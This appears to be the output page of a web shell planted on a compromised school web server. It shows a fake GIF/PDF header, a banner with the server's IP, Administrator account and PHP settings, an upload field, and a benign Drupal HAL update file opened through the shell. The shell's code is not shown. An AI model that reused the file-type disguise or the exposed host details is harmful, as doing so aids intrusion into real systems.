GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/hal/ |
Upload File : |
<?php /** * @file * Update functions for the HAL module. */ /** * Move 'link_domain' from 'rest.settings' to 'hal.settings'. */ function hal_update_8301() { $config_factory = \Drupal::configFactory(); // The default value for the 'link_domain' key is `~`, which is the YAML // equivalent of PHP's `NULL`. If the REST module is not installed, this is // the value we will store in 'hal.settings'. $link_domain = NULL; // But if the REST module was installed, we migrate its 'link_domain' setting, // because we are actually moving that setting from 'rest.settings' to // 'hal.settings'. $rest_settings = $config_factory->getEditable('rest.settings'); if ($rest_settings->getRawData() !== []) { $link_domain = $rest_settings->get('link_domain'); // Remove the 'link_domain' setting from 'rest.settings'. $rest_settings->clear('link_domain') ->save(); } $hal_settings = $config_factory->getEditable('hal.settings'); $hal_settings->set('link_domain', $link_domain); $hal_settings->save(TRUE); }